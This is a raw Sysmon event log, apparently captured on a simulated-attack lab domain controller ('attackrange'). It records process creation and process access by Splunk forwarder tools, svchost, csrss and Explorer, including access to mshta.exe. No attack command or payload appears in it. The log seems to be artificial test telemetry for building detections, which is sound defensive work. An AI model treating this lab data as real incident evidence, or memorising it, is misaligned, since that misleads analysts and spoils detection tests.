Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.213{7901BC46-552E-6008-DF06-00000000A301}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.650{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-552F-6008-E106-00000000A301}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.650{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.650{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.650{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.650{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.650{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-552F-6008-E106-00000000A301}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.650{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-552F-6008-E106-00000000A301}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.651{7901BC46-552F-6008-E106-00000000A301}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:11.134{7901BC46-552E-6008-E006-00000000A301}77767028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:23.040{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:23.040{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:23.040{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 